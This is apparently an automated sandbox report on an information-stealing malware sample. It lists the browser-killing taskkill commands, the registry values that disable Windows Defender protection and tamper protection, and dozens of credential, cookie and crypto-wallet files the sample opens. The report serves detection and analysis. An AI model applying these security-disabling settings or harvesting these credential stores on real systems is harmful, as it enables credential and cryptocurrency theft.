Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe "C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe"
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: ba17bbfb21.exe, 0000000B.00000002.3194386177.0000000000672000.00000002.00000001.01000000.0000000D.sdmp, ba17bbfb21.exe.6.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 79ddad050f.exe, 79ddad050f.exe, 00000008.00000002.3256159559.000000000054C000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: 0ms`Program Manager
Source: 79ddad050f.exe, 00000008.00000002.3256159559.000000000054C000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: o0ms`Program Manager
Source: 4611cc433b.exe, 4611cc433b.exe, 00000007.00000002.3256554166.00000000009AE000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: z?wProgram Manager
Source: file.exe, 00000000.00000002.2058469274.0000000000CD7000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2089326329.0000000000437000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000003.00000002.2089930595.0000000000437000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: 6h%Program Manager
Source: firefox.exe, 0000001B.00000002.3262020047.0000001AF49FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?ProgmanListenerWi
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0020DD91 cpuid 6_2_0020DD91
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AACBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00AACBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_001F65E0 LookupAccountNameA, 6_2_001F65E0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00232517 GetTimeZoneInformation, 6_2_00232517
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Registry value created: TamperProtection 0
Source: 79ddad050f.exe, 00000008.00000002.3262371223.0000000000F64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 2.2.skotes.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.skotes.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.a90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3255134958.00000000001F1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2089024610.00000000001F1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2055475326.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2086144710.00000000001F1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ba17bbfb21.exe PID: 3380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 79ddad050f.exe PID: 5228, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 79ddad050f.exe PID: 2576, type: MEMORYSTR
Source: Yara match File source: 00000009.00000002.3254990045.0000000000251000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3255076281.0000000000251000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2997152380.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3265209742.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3165593747.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: e051bdf457.exe PID: 3716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e051bdf457.exe PID: 5312, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: 79ddad050f.exe, 00000008.00000003.2972144892.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\walletsb
Source: 79ddad050f.exe, 00000008.00000003.3179670006.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: 79ddad050f.exe, 00000008.00000003.2972144892.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/JAXX New Version
Source: 79ddad050f.exe, 00000008.00000003.3179670006.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: 79ddad050f.exe, 00000008.00000003.3093876019.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 79ddad050f.exe, 00000008.00000003.3093876019.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 79ddad050f.exe, 0000000A.00000003.3166621569.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: 79ddad050f.exe, 00000008.00000003.2978992587.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 79ddad050f.exe, 00000008.00000003.2978992587.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
